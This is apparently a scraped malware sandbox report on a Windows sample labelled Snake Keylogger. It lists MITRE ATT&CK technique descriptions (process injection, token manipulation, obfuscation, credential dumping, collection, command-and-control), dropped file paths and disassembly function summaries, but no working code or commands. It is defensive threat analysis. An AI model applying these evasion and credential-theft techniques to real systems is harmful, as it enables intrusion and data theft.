Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ln5S7fIBkY.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gy1kyeh5.sxu.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxfpecd1.v4r.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n312bjz4.vwm.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qc4pqyb5.vjg.ps1

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Bevidstgjorde.ren

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Unremorsefulness.Ska

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Yellowfin.pre

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\kakaosmrs.txt

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe:Zone.Identifier

Windows Analysis Report
ln5S7fIBkY.exe

Function 0040336C Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Function 0040543E Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 004059A9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 004065DA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Function 00403D35 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 00403987 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402EDD Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Function 004062B9 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 004052FF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 00406601 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre